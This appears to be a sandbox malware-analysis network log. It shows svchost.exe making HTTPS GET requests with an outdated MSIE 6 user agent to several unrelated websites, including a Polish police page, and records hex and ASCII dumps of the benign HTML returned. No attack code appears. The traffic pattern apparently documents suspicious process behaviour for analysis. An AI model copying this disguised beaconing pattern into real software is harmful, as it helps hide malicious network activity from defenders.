                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=100
                                                                                                                                                                                                                                                                          Content-Length: 49050
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:00 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17273INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17276INData Raw: 29 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73
                                                                                                                                                                                                                                                                          Data Ascii: )}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17284INData Raw: 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75
                                                                                                                                                                                                                                                                          Data Ascii: .4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' du
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17292INData Raw: 63 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76
                                                                                                                                                                                                                                                                          Data Ascii: ch":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/rev
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17301INData Raw: 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 76 61 72 20 6c 6f 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 22 29 3b 76 61 72 20 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ript">document.addEventListener("DOMContentLoaded",function(event){var load=document.getElementById("load");var removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.co.uk/wp-cont
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17309INData Raw: 65 2d 69 74 65 6d 2d 31 36 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 35 38 20 61 63 74 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65
                                                                                                                                                                                                                                                                          Data Ascii: e-item-16 current_page_item menu-item-54058 act first"><a href='https://dataform.co.uk/' data-level='1'><span class="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page me
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17317INData Raw: 30 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3b 63 3d 63 2e 72 65 70 6c 61 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f
                                                                                                                                                                                                                                                                          Data Ascii: 0*1000;var diffms=(now-gmt);</script><script type="text/javascript">var c=document.body.className;c=c.replace(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform.co.uk/wp-co


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          102192.168.2.615760172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17149OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:01 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xG6jJ14skz3Cs2V7VBZPx6GwMQdM6GdRsOgB6AB1EtLaI32VzcuUCJ9SDw5bLQKgL3G8yurt1%2FaDONESr4Ny8n3mI58guHzvB2biPuX2rF0%2Fh30GmkjCUzfPww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e536f6b35e4-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17301INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          103192.168.2.61573491.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17149OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:09:32 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17149INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17165INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17181INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17197INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 33 34 39 34 35 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 39 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.034945 / WebAdministrator (05.07.2023 08:09) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          104192.168.2.61578035.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17197OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17198INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:00 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17198INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17214INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17230INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17246INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
